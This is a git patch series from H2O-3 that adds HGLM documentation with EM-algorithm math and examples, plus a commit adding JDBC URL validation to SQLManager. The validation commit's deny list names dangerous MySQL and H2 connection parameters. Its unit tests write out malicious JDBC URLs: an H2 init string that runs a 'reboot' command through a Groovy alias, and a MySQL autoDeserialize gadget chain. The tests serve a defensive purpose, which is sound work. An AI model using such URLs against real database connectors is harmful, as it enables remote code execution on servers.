\text{ equation 10} + +where :math:`N = \sum^J_{j=1} n_j`. + +.. note:: + + This reasoning defines certain complete-data sufficient statistics (CDSS), that is, statistics that would be sufficient to estimate :math:`\theta_f, T, \text{ and } \sigma^2` if the complete data were observed. These are: + + .. math:: + + \sum^J_{j=1} A^T_{fj} A_{rj} \theta_{rj}, \sum^J_{j=1} \theta_{rj} \theta^T_{rj}, \sum^J_{j=1} Y^T_j A_{rj} \theta_{rj}, \sum^J_{j=1} \theta^T_{rj} A^T_{rj} A_{rj} \theta_{rj} \quad \text{ equation 11}. + +E-step +~~~~~~ + +While the CDSS are not observed, they can be estimated by their conditional expectations given the data :math:`Y` and parameter estimates from the previous iterations. `Dempster et al. 
[4] <#references>`__ showed that substituting the expected CDSS into the M-step formulas would produce new parameter estimates having a higher likelihood than the current estimates. + +To find :math:`E(CDSS | Y, \theta_f, T, \sigma^2)` requires deriving the conditional distribution of the missing data :math:`\theta_r`, given :math:`Y, \theta_f, T, \sigma^2`. From *equation 6*, the joint distribution of the complete data is: + +.. math:: + + \begin{pmatrix} Y_j \\ \theta_{rj} \\\end{pmatrix} \sim N \Bigg[ \begin{pmatrix} A_{fj} \theta_{f} \\ 0 \\\end{pmatrix} , \begin{pmatrix} A_{rj}T_jA^T_{rj} + \sigma^2 I_{n_j} & A_{rj}T_j \\ T_j A^T_{rj} & T_j \\\end{pmatrix} \Bigg] \quad \text{ equation 12} + +From *equation 12*, we can obtain the conditional distribution of the missing data given the observed data as follows: + +.. math:: + + \theta_{rj} | Y, \theta_f, T_j, \sigma^2 \sim N (\theta^*_{rj}, \sigma^2 C_j^{-1}) \quad \text{ equation 13} + +with + +.. math:: + + \theta^*_{rj} = C^{-1}_j A^T_{rj} (Y_j - A_{fj} \theta_f) \quad \text{ equation 14} + + C_j = A^T_{rj} A_{rj} + \sigma^2 T^{-1}_j \quad \text{ equation 15} + +The complete EM algorithm +~~~~~~~~~~~~~~~~~~~~~~~~~ + +The complete EM algorithm is as follows: + +1. Initialization: randomly assign some small values to :math:`\theta_f, \sigma^2, T_j`; +2. Estimation: estimate the CDSS: + + .. math:: + + E \big( \sum^J_{j=1} A^T_{fj} A_{rj} \theta_{rj} | Y, \theta_f, T_j, \sigma^2 \big) = \sum^J_{j=1} A^T_{fj} A_{rj} \theta^*_{rj} \\ E \big( \sum^J_{j=1} \theta_{rj} \theta^T_{rj} | Y, \theta_f, T_j, \sigma^2 \big) = \sum^J_{j=1} \theta^*_{rj} \theta^{*T}_{rj} + \sigma^2 \sum^J_{j=1} C^{-1}_j \quad \text{ equation 17} \\ E \big( \sum^J_{j=1} r^T_j r_j | Y, \theta_f, T_j, \sigma^2 \big) = \sum^J_{j=1} r^{*T}_j r^*_j + \sigma^2 \sum^J_{j=1} tr(C^{-1}_j A^T_{rj} A_{rj}) + + where: :math:`r^*_j = Y_j - A_{fj} \theta_f - A_{rj} \theta^*_{rj}, \theta^*_{rj} = C^{-1}_j A^T_{rj} (Y_j - A_{fj} \theta_f), C_j = A^T_{rj} A_{rj} + \sigma^2 T^{-1} \text{ and } \theta_f, \sigma^2, T` are based on the previous iteration or from initialization; + +3. Substitution: substitute the estimated CDSS from *equation 17* into the M-step formulas (*equations 8, 9,* and *10*); +4. Processing: feed the new estimates of :math:`\theta_f, \sigma^2, T_j` into step 2; +5. Cycling: continue steps 2, 3, and 4 until the following stopping condition is satisfied: + + - The largest change in the value of any of the parameters is sufficiently small. + +A minimal code sketch of this loop is shown after the model definitions below. + +Log-likelihood for HGLM +~~~~~~~~~~~~~~~~~~~~~~~ + +The model for level-2 unit :math:`j` can be written as: + +.. math:: + + Y_j = A_{fj} \theta_f + d_j = X_j \theta_f + d_j, \quad d_j \sim N(0,V_j) + +where: + +- :math:`Y_j \text{ is an } n_j` by 1 outcome vector; +- :math:`A_{fj} / X_j = \begin{bmatrix} x^T_{j1} \\ x^T_{j2} \\ x^T_{j3} \\ \vdots \\ x^T_{jn_{j}} \\\end{bmatrix}` is a known :math:`n_j \text{ by } p` matrix of level-1 predictors and :math:`x_{ji} = \begin{bmatrix} x^1_{ji} \\ x^2_{ji} \\ \vdots \\ x^{p-1}_{ji} \\ 1 \\\end{bmatrix}`; +- :math:`\theta_f \text{ is a } p` by 1 vector of fixed effects; +- :math:`d_j = A_{rj} \theta_{rj} + r_j = Z_j \theta_{rj} + r_j , A_{rj} / Z_j \text{ is } n_j \text{ by } q`; +- :math:`\theta_{rj} \sim N(0,T), \theta_{rj} \text{ is } q` by 1, :math:`T \text{ is } q \text{ by } q`; +- :math:`r_j \sim N(0, \sigma^2 I_{n_j}), I_{n_j} \text{ is } n_j \text{ by } n_j`; +- :math:`V_j = A_{rj} TA^T_{rj} + \sigma^2 I_{n_j} = Z_j TZ^T_j + \sigma^2 I_{n_j}, \text{ is } n_j \text{ by } n_j`. 
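+
+The following standalone NumPy sketch illustrates the EM loop above (*equations 8-10*, with the E-step of *equations 14-15* and the CDSS of *equation 17*). It is for intuition only, not H2O's implementation, and every name in it is invented for the example:
+
+.. code-block:: python
+
+   import numpy as np
+
+   def hglm_em(Xs, Zs, Ys, n_iter=200, tol=1e-6):
+       """EM for Y_j = X_j theta_f + Z_j theta_rj + r_j, theta_rj ~ N(0, T), r_j ~ N(0, sigma2 I)."""
+       p, q, J = Xs[0].shape[1], Zs[0].shape[1], len(Ys)
+       N = sum(len(y) for y in Ys)
+       theta_f, sigma2, T = np.zeros(p), 1.0, np.eye(q)      # step 1: initialization
+       for _ in range(n_iter):
+           # E-step (equations 14-15): C_j = Z_j^T Z_j + sigma2 T^-1,
+           # theta*_rj = C_j^-1 Z_j^T (Y_j - X_j theta_f)
+           Cs = [Z.T @ Z + sigma2 * np.linalg.inv(T) for Z in Zs]
+           ts = [np.linalg.solve(C, Z.T @ (y - X @ theta_f))
+                 for C, X, Z, y in zip(Cs, Xs, Zs, Ys)]
+           # M-step, equation 8: OLS for theta_f given the expected random effects
+           lhs = sum(X.T @ X for X in Xs)
+           rhs = sum(X.T @ (y - Z @ t) for X, Z, y, t in zip(Xs, Zs, Ys, ts))
+           theta_f_new = np.linalg.solve(lhs, rhs)
+           # M-step, equations 9 and 17: update T from the expected CDSS
+           T = sum(np.outer(t, t) + sigma2 * np.linalg.inv(C) for t, C in zip(ts, Cs)) / J
+           # M-step, equations 10 and 17: update sigma2 from the expected residual CDSS
+           res = [y - X @ theta_f_new - Z @ t for X, Z, y, t in zip(Xs, Zs, Ys, ts)]
+           sigma2 = sum(r @ r + sigma2 * np.trace(np.linalg.solve(C, Z.T @ Z))
+                        for r, C, Z in zip(res, Cs, Zs)) / N
+           if np.max(np.abs(theta_f_new - theta_f)) < tol:   # L-infinity stopping rule
+               theta_f = theta_f_new
+               break
+           theta_f = theta_f_new
+       return theta_f, sigma2, T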
For each level-2 value :math:`j`, the likelihood can be written as: + +.. math:: + + L(Y_j; \theta_f, \sigma^2, T_j) = (2 \pi)^{-n_{j} /2} |V_j|^{-1/2} \exp \{ -\frac{1}{2} d^T_j V^{-1}_j d_j\} + +The log-likelihood is: + +.. math:: + + ll(Y_j; \theta_f, \sigma^2 , T_j) = -\frac{1}{2} \Big( n_j \log{(2 \pi)} + \log{(|V_j|)} + (Y_j - X_j \theta_f)^T V^{-1}_j (Y_j - X_j \theta_f) \Big) + +Since we assume that the level-2 units are independent, the total log-likelihood is just the sum of the log-likelihoods over the level-2 units. Let :math:`T=T_j`: + +.. math:: + + ll(Y; \theta_f, \sigma^2, T) \\ + + = \sum^J_{j=1} \Big\{ - \frac{1}{2} \big( n_j \log{(2 \pi)} + \log{(|V_j|)} + (Y_j - X_j \theta_f)^T V^{-1}_j (Y_j - X_j \theta_f) \big) \Big\} = + + -\frac{1}{2} n \log{(2 \pi)} -\frac{1}{2} \Big\{ \sum^J_{j=1} \big( \log{(|V_j|)} + (Y_j - X_j \theta_f)^T V^{-1}_j (Y_j - X_j \theta_f) \big) \Big\} + +:math:`|V_j|` can be calculated with the matrix determinant lemma as: + +.. math:: + + |V_j| = \Big|Z_j TZ^T_j + \sigma^2 I_{n_j} \Big| = \Big|T^{-1} + \frac{1}{\sigma^2} Z^T_j Z_j \Big| |T| \Big| \sigma^2 I_{n_j} \Big| = \sigma^{2n_j} \Big| T^{-1} + \frac{1}{\sigma^2} Z^T_j Z_j \Big| |T| + +where, by the Woodbury matrix identity: :math:`V^{-1}_j = \frac{1}{\sigma^2} I_{n_j} - \frac{1}{\sigma^4} Z_j \Big( T^{-1} + \frac{1}{\sigma^2} Z^T_j Z_j \Big)^{-1} Z^T_j` + +:math:`(Y_j - X_j \theta_f)^T V_j^{-1} (Y_j - X_j \theta_f)` can be calculated as: + +.. math:: + + (Y_j - X_j \theta_f)^T V_j^{-1} (Y_j - X_j \theta_f) = \frac{1}{\sigma^2} (Y_j - X_j \theta_f)^T (Y_j - X_j \theta_f) - \frac{1}{\sigma^4} (Y_j - X_j \theta_f)^T Z_j (T^{-1} + \frac{1}{\sigma^2} Z^T_j Z_j)^{-1} Z^T_j (Y_j - X_j \theta_f) + +The final log-likelihood is: + +.. math:: + + ll(Y; \theta_f, \sigma^2, T) = - \frac{1}{2} n \log{(2 \pi)} - \frac{1}{2} \Big\{ \sum^J_{j=1} \big( \log{(|V_j|)} + \frac{1}{\sigma^2} (Y_j - X_j \theta_f)^T (Y_j - X_j \theta_f) \\ - \frac{1}{\sigma^4} (Y_j - X_j \theta_f)^T Z_j \big(T^{-1} + \frac{1}{\sigma^2} Z^T_j Z_j \big)^{-1} Z^T_j (Y_j - X_j \theta_f) \big) \Big\} + +Examples +-------- + +The following are simple HGLM examples in Python and R. + +.. tabs:: + .. 
code-tab:: python + + # Initialize H2O-3 and import the HGLM estimator: + import h2o + h2o.init() + from h2o.estimators import H2OHGLMEstimator as hglm + + # Import the Gaussian wintercept dataset: + h2o_data = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/hglm_test/gaussian_0GC_678R_6enum_5num_p05oise_p08T_wIntercept_standardize.gz") + + # Split the data into training and validation sets: + train, valid = h2o_data.split_frame(ratios = [.8], seed = 1234) + + # Define the predictors and response: + y = "response" + x = h2o_data.names + x.remove("response") + x.remove("C1") + + # Set the random columns: + random_columns = ["C10","C20","C30"] + + # Build and train the model: + hglm_model = hglm(random_columns=random_columns, + group_column = "C1", + score_each_iteration=True, + seed=12345, + em_epsilon = 0.000005) + hglm_model.train(x=x, y=y, training_frame=train, validation_frame=valid) + + # Grab various metrics (model metrics, scoring history, coefficients, etc.): + modelMetrics = hglm_model.training_model_metrics() + scoring_history = hglm_model.scoring_history(as_data_frame=False) + scoring_history_valid = hglm_model.scoring_history_valid(as_data_frame=False) + model_summary = hglm_model.summary() + coef = hglm_model.coef() + coef_norm = hglm_model.coef_norm() + coef_names = hglm_model.coef_names() + coef_random = hglm_model.coefs_random() + coef_random_names = hglm_model.coefs_random_names() + coef_random_norm = hglm_model.coefs_random_norm() + coef_random_names_norm = hglm_model.coefs_random_names_norm() + t_mat = hglm_model.matrix_T() + residual_var = hglm_model.residual_variance() + mse = hglm_model.mse() + mse_fixed = hglm_model.mean_residual_fixed() + mse_fixed_valid = hglm_model.mean_residual_fixed(train=False) + icc = hglm_model.icc() + + .. code-tab:: r R + + # Initialize H2O-3: + library(h2o) + h2o.init() + + # Import the Gaussian wintercept dataset: + h2odata <- h2o.importFile("https://s3.amazonaws.com/h2o-public-test-data/smalldata/hglm_test/gaussian_0GC_allRC_2enum2numeric_p5oise_p08T_wIntercept_standardize.gz") + + # Set the predictors and response: + yresp <- "response" + predictor <- c("C2", "C3", "C4", "C5") + + # Set the random and group columns: + random_columns <- c("C2", "C3", "C4", "C5") + group_column <- "C1" + + # Build and train the model: + hglm_model <- h2o.hglm(x = predictor, + y = yresp, + training_frame = h2odata, + group_column = group_column, + random_columns = random_columns, + seed = 12345, + max_iterations = 10, + em_epsilon = 0.0000001, + random_intercept = TRUE) + + # Find the coefficients: + coeff <- h2o.coef(hglm_model) + +References +---------- + +[1] David Ruppert, M. P. Wand and R. J. Carroll, Semiparametric Regression, Chapter 4, Cambridge University Press, 2003. + +[2] Stephen W. Raudenbush, Anthony S. Bryk, Hierarchical Linear Models: Applications and Data Analysis Methods, Second Edition, Sage Publications, 2002. + +[3] Rao, C. R. (1973). Linear Statistical Inference and Its Applications. New York: Wiley. + +[4] Dempster, A. P., Laird, N. M., & Rubin, D. B. (1977). Maximum likelihood from incomplete data via the EM algorithm. Journal of the Royal Statistical Society, Series B, 39, 1-38. + +[5] Matrix determinant lemma: https://en.wikipedia.org/wiki/Matrix_determinant_lemma. + +[6] Woodbury matrix identity: https://en.wikipedia.org/wiki/Woodbury_matrix_identity. 
\ No newline at end of file diff --git a/h2o-docs/src/product/images/HGLM.png b/h2o-docs/src/product/images/HGLM.png new file mode 100644 index 0000000000000000000000000000000000000000..a21e438b9172088444de21e4ba8199fe5e322329 GIT binary patch literal 9054 [base85-encoded binary data for the new HGLM.png badge image omitted]
zCHxFP!hOJn#&_4IVi$}H%=T)X=H9(~7b{dPAuetO0zTG{KsrtP9SGb@0s;xw6+su1 zHM*#hE&-fclDP>O-U$dXC4N;4f)uX-a5$%_jT?KE9aiE92uqpnW5s57RhQ zI682jo}C4y>fyuC%1W6h0=I}k3#{oRE-87ck}csEgqmjQVjBUOwariKo)fl$96d8U zqGe^7w~FgSP$7uF&U`Y}x^ zn9LA0h*KKNJ6j3UzOlz;E;{glu&k`Cq|epEXXmwn=P<{(l$2;NW*{@~ ze%vk7KxTf582T)^V$@d~SNamD@#x^dzb#qDaNv2EFmhNLuo%7(;%B^_Ec~Cpd{G5m zc!z{0Gk(iZ1&RX-HC>mC(VLu{3p$$;-T!|+pddcty@*e!xN`J&EwdW$PF5$q zr@{neWMtBQ+m|Js2OuaED&!&wWO#VE$al*T6#EH~&w%GYE?YQz4KIHXZzz}c6INMSM$qbtw20Ky)U1Muz+{xvXhQ7;SO)&Y({UL`M@P_~8G~s- zOKa=3D#{Q|Ev;D0U=3(A2BJI^!+yaD8OT~-iYvapRq3rNV1h#akWq>X&ul)ey?Ni( zcD2`z^LXa-E>&S4#{ouQ=U%BtFT3mL=}~97Crn9Tx*pEYJMRAYF;)6i!LaJ=^_c3d z%MN;8UQ)4faa*}EKI@!X+S-&ooz%ZTMLYvEeUaw`8bPclAXVLf2Q@S`C&U)!9)Khp zm~AdcL!~I?zUw~k?(Dn^EIkQg=zc`Rd}7L2o%<}+sP`1*nX_m4Mo#4zflEexW|^)g zNiM0^mxBQWKx8pxo2E-jPSwFc=K0ygbuN{gJ{2 zM#cnWxKTk-5zW1O_p~aMf>+~Z9R`65MV$IBPtVL;8i{y^mGe0b93eXDyC4uI^Gxnn zwV&zj@8`IDnF2(OnukYO*AnT@-fRj7FE8ocyLYp*v-PW(*bPVtvHMYgAN^gHr4hX30TB0HQKxQ6Dftfc3-Ys?+l5Be_LI{R~u_>FG@#W=` z7Zn38g4sY5Xk=p&6SFYdu=LYlbz9 zfw=Q1J1-A3IhO!y1%F+m0_l4d3q4E6qx*j2t0Fbvy5H#hL4UeDTp6;yjt1x82c}>k zgIioYvsu9^>Oz4zd=|wZ5?pv8hPmy_7ZLQd#={E|r(V2x0SMlKr*Ro7fZ&R@HaR{W ze$9aaxncqHg|}`~Vcd!epsTR?HCJCj|35l@-&F+vx!~w%srN1g_|m`{xZvl{71Kdr zbp;0zX2n1lXrK@ZQYHv-C>4ZInIwoHjj$o;U$6gVmj8ipxC_~eeR2BrWl|&vO^Bwd LF04S=D)`?3B0vth literal 0 HcmV?d00001 diff --git a/h2o-docs/src/product/parameters.rst b/h2o-docs/src/product/parameters.rst index e785975a42fc..edd607a41b6d 100644 --- a/h2o-docs/src/product/parameters.rst +++ b/h2o-docs/src/product/parameters.rst @@ -53,7 +53,6 @@ This Appendix provides detailed descriptions of parameters that can be specified data-science/algo-params/fold_column data-science/algo-params/gainslift_bins data-science/algo-params/gradient_epsilon - data-science/algo-params/hglm data-science/algo-params/histogram_type data-science/algo-params/huber_alpha data-science/algo-params/ignore_const_cols From ac1d642b4d86f10a02d75974055baf2a4b2025ac Mon Sep 17 00:00:00 2001 From: krasinski <8573352+krasinski@users.noreply.github.com> Date: Sun, 27 Oct 2024 17:13:03 +0100 Subject: [PATCH 12/12] GH-16425 Add JDBC parameter validation [nocheck] (#16432) * GH-16425 Add JDBC parameter validation * swap exception expectation --- .../src/main/java/water/jdbc/SQLManager.java | 45 +++++++++++++++++++ .../test/java/water/jdbc/SQLManagerTest.java | 20 +++++++++ 2 files changed, 65 insertions(+) diff --git a/h2o-core/src/main/java/water/jdbc/SQLManager.java b/h2o-core/src/main/java/water/jdbc/SQLManager.java index 855b20838687..8b148d706a81 100644 --- a/h2o-core/src/main/java/water/jdbc/SQLManager.java +++ b/h2o-core/src/main/java/water/jdbc/SQLManager.java @@ -5,10 +5,20 @@ import water.parser.ParseDataset; import water.util.Log; +import java.io.UnsupportedEncodingException; +import java.net.URI; +import java.net.URISyntaxException; +import java.net.URLDecoder; import java.sql.*; +import java.util.Arrays; +import java.util.List; import java.util.Objects; import java.util.concurrent.ArrayBlockingQueue; import java.util.concurrent.atomic.AtomicLong; +import java.util.regex.Matcher; +import java.util.regex.Pattern; +import java.util.stream.Collectors; +import java.util.stream.Stream; public class SQLManager { @@ -30,6 +40,15 @@ public class SQLManager { private static final String TMP_TABLE_ENABLED = H2O.OptArgs.SYSTEM_PROP_PREFIX + "sql.tmp_table.enabled"; + private static final String DISALLOWED_JDBC_PARAMETERS_PARAM = H2O.OptArgs.SYSTEM_PROP_PREFIX + "sql.jdbc.disallowed.parameters"; + + private static final Pattern 
JDBC_PARAMETERS_REGEX_PATTERN = Pattern.compile("(?i)[?;&]([a-z]+)="); + + private static final List DEFAULT_JDBC_DISALLOWED_PARAMETERS = Stream.of( + "autoDeserialize", "queryInterceptors", "allowLoadLocalInfile", "allowMultiQueries", //mysql + "allowLoadLocalInfileInPath", "allowUrlInLocalInfile", "allowPublicKeyRetrieval", //mysql + "init", "script", "shutdown" //h2 + ).map(String::toLowerCase).collect(Collectors.toList()); private static AtomicLong NEXT_TABLE_NUM = new AtomicLong(0); static Key nextTableKey(String prefix, String postfix) { @@ -58,6 +77,7 @@ public static Job importSqlTable( final String username, final String password, final String columns, final Boolean useTempTable, final String tempTableName, final SqlFetchMode fetchMode, final Integer numChunksHint) { + validateJdbcUrl(connection_url); final Key destination_key = nextTableKey(table, "sql_to_hex"); final Job j = new Job<>(destination_key, Frame.class.getName(), "Import SQL Table"); @@ -533,6 +553,7 @@ private static int estimateConcurrentConnections(final int cloudSize, final shor * @throws SQLException if a database access error occurs or the url is */ public static Connection getConnectionSafe(String url, String username, String password) throws SQLException { + validateJdbcUrl(url); initializeDatabaseDriver(getDatabaseType(url)); try { return DriverManager.getConnection(url, username, password); @@ -588,6 +609,30 @@ static void initializeDatabaseDriver(String databaseType) { } } + public static void validateJdbcUrl(String jdbcUrl) throws IllegalArgumentException { + if (jdbcUrl == null || jdbcUrl.trim().isEmpty()) { + throw new IllegalArgumentException("JDBC URL is null or empty"); + } + + if (!jdbcUrl.toLowerCase().startsWith("jdbc:")) { + throw new IllegalArgumentException("JDBC URL must start with 'jdbc:'"); + } + + Matcher matcher = JDBC_PARAMETERS_REGEX_PATTERN.matcher(jdbcUrl); + String property = System.getProperty(DISALLOWED_JDBC_PARAMETERS_PARAM); + List disallowedParameters = property == null ? + DEFAULT_JDBC_DISALLOWED_PARAMETERS : + Arrays.stream(property.split(",")).map(String::toLowerCase).collect(Collectors.toList()); + + while (matcher.find()) { + String key = matcher.group(1); + if (disallowedParameters.contains(key.toLowerCase())) { + throw new IllegalArgumentException("Potentially dangerous JDBC parameter found: " + key + + ". 
That behavior can be altered by setting the " + DISALLOWED_JDBC_PARAMETERS_PARAM + " system property to another comma-separated list."); + } + } + } + static class SqlTableToH2OFrameStreaming { final String _table, _columns, _databaseType; final int _numCol; diff --git a/h2o-core/src/test/java/water/jdbc/SQLManagerTest.java b/h2o-core/src/test/java/water/jdbc/SQLManagerTest.java index d52febaa50f8..179311eebeec 100644 --- a/h2o-core/src/test/java/water/jdbc/SQLManagerTest.java +++ b/h2o-core/src/test/java/water/jdbc/SQLManagerTest.java @@ -145,4 +145,24 @@ public void testBuildSelectChunkSql() { Assert.assertEquals("SELECT * FROM mytable LIMIT 1310 OFFSET 0", SQLManager.buildSelectChunkSql("", "mytable", 0, 1310, "*", null)); } + + @Test + public void testValidateJdbcConnectionStringH2() { + exception.expect(IllegalArgumentException.class); + exception.expectMessage("Potentially dangerous JDBC parameter found: init"); + + String h2MaliciousJdbc = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE ALIAS RBT AS '@groovy.transform.ASTTest(value={ assert java.lang.Runtime.getRuntime().exec(\"reboot\")" + "})" + "def rbt" + "'"; + + SQLManager.validateJdbcUrl(h2MaliciousJdbc); + } + + @Test + public void testValidateJdbcConnectionStringMysql() { + exception.expect(IllegalArgumentException.class); + exception.expectMessage("Potentially dangerous JDBC parameter found: autoDeserialize"); + + String mysqlMaliciousJdbc = "jdbc:mysql://domain:123/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=abcd"; + + SQLManager.validateJdbcUrl(mysqlMaliciousJdbc); + } }
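For reference, a minimal usage sketch of the new validation (illustrative only; it assumes H2O.OptArgs.SYSTEM_PROP_PREFIX resolves to "sys.ai.h2o.", and the URLs below are made up):

    // Hypothetical override of the default disallowed list (a system property, not an env variable):
    System.setProperty("sys.ai.h2o.sql.jdbc.disallowed.parameters", "init,script,shutdown");

    // Passes after the override: "autoDeserialize" is no longer on the disallowed list.
    SQLManager.validateJdbcUrl("jdbc:mysql://host:3306/db?autoDeserialize=true");

    // Still throws IllegalArgumentException: "init" remains disallowed.
    SQLManager.validateJdbcUrl("jdbc:h2:mem:test;init=RUNSCRIPT FROM 'http://attacker/x.sql'");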